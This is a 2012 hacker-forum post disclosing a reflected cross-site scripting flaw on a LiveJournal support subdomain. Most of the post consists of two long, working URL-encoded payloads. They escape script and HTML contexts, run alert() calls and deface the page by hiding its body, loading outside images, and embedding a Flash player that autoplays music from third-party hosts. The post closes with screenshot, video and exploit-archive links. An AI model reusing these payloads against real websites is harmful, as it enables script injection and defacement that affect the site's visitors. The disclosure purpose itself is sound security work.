Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Livejournal.com Cross Site Scripting
Posted by: Sony
Date: February 28, 2012 01:45AM

# Exploit Title: Livejournal.com Cross Site Scripting
# Date: 27.02.2012
# Author: Sony
# Software Link: http://www.livejournal.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/livejournalcom-cross-site-scripting.html
..................................................................

Yes. It's a Cross Site Scripting "Don't Cry"..

http://lj-support.livejournal.com/go?

Demo:

http://lj-support.livejournal.com/2012/02/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/peo/det/dety38.jpg%22%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Presents:Cross%20Site%20Scripting%20-Don%27t%20Cry..create%20by%20Sony%22%29%3C/script%3E%20%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=http://www.audiopoisk.com/files/no/guns-n-roses---guns-n-roses---13---dont-cry-398865.mp3&autostart=yes%22%3E%3C/object%3E

http://4.bp.blogspot.com/-VgKZCGG5yDw/T0uBZbDh-vI/AAAAAAAAAoY/T0d_gunfhZE/s1600/jj2.JPG

http://lj-support.livejournal.com/2012/02/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cstyle%3Ebody%7Bvisibility:hidden;%7D%20html%7Bbackground-image:url%28%27http://www.lenagold.ru/fon/ori/nebo/cher/star43.jpg%27%29;%7D%3C/style%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://www.krassota.com/i/dance/11.gif%22%20style=%22height:%20600px;%20width:%20900px;%22%3E%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=http://www.audiopoisk.com/files/pretty-woman/elvis-presli-1665209.mp3&autostart=yes%22%3E%3C/object%3E


http://1.bp.blogspot.com/-i2FmeNDzlUU/T0uBiG2zYuI/AAAAAAAAAok/XriZjrHFTH0/s1600/el1.JPG

http://1.bp.blogspot.com/-QWgci5-ZHlI/T0uBm8KAxrI/AAAAAAAAAow/7BbQILhj15I/s1600/el2.JPG

video:

http://www.youtube.com/watch?feature=player_embedded&v=wPDXH560QhA

http://dl.packetstormsecurity.net/1202-exploits/livejournal-xss.txt

Options: ReplyQuote


Sorry, only registered users may post in this forum.